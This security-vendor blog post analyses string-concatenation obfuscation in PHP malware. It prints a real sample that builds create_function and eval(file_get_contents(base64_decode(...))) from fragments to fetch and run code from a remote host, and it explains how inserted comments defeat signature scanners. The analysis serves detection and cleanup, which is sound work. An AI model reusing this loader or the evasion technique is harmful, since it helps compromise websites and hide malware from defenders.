• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Uncommon Radixes Obfuscation

String Concatenation: Obfuscation Techniques

August 12, 2020Krasimir Konov

FacebookTwitterSubscribe

While string concatenation has many valuable applications in development — such as making code more efficient or functions more effective — it is also a popular way for attackers to obfuscate code and try to make it more difficult to detect. Let’s dig into how bad actors are leveraging this technique to conceal their malware.

Avoiding Detection with String Concatenation

String concatenation obfuscation works by using a period between each string, which instructs PHP to join these character strings  together and run it as a single function — for example, ‘cr’.’ea’.’te’.’_f’.’un’.’c’.’ti’.’o’.’n’; would become create_function. This is done to avoid the detection of commands like base64_decode and file_get_contents, which are commonly employed to perform malicious activities.

<?php
$a = 'cr'.'ea'.'te'.'_f'.'un'.'c'.'ti'.'o'.'n';
$f = $a('$a', 'E'./**/'v'.'A'./**/'l'.'(fil'.'e_g'.'et_c'.'onte'.'nts'.'(b'.'as'.'e6'.'4_d'.'ec'.'od'.'e'.'("a'.'HR'.'0cDovL2'.'5hdGl2ZXJlZ'.'GlyLnR'.'rL2x4LzEu'.'dHh0")));');
$f(1);
?>

In this example, the malware concatenates the strings ‘create_function’ and ‘eval(file_get_contents(base64_decode(‘.

The function file_get_contents pulls code from an external website (hxxp://nativeredir[.]tk/lx/1.txt), which is then run through eval and executed. The attackers pull the code from an external source to maintain control and allow for flexibility — they can easily change the code they want to run by simply replacing the 1.txt file.

Pulling external code in this manner is common practice. In many cases, we find websites that have been compromised to be used to distribute malware. We’ve also found services like Pastebin and GitHub used to host malicious code for these purposes.

The code can also be easily modified to add comments in different places, just like you see in the example above (/**/). Comments like these can be placed between any string and make detection much harder, especially for malware removal tools that rely on strings found in the malware in order to detect it in the future. One popular method is to use a tool that adds random comments throughout the malware, making every sample slightly unique and more difficult to detect.

Applications of String Concatenation in Malware

While in this particular case the remote code injected hidden spam links to the victim’s website,  it’s possible for bad actors to run any kind of malware or phishing in these types of scripts.. The code in the remote URL can also be modified to meet their requirements.

Samples like these clearly highlight how easy it is for attackers to obfuscate code. For example, if you’re a DIY type and you’re trying to clean up malware on your website, you might be looking for eval or file_get_contents, but in this case you won’t be able to detect those strings in this code.

We’re always happy to help if you need a hand with malware cleanup.

FacebookTwitterSubscribe

Categories: Security Education, Sucuri Labs, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Obfuscation

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.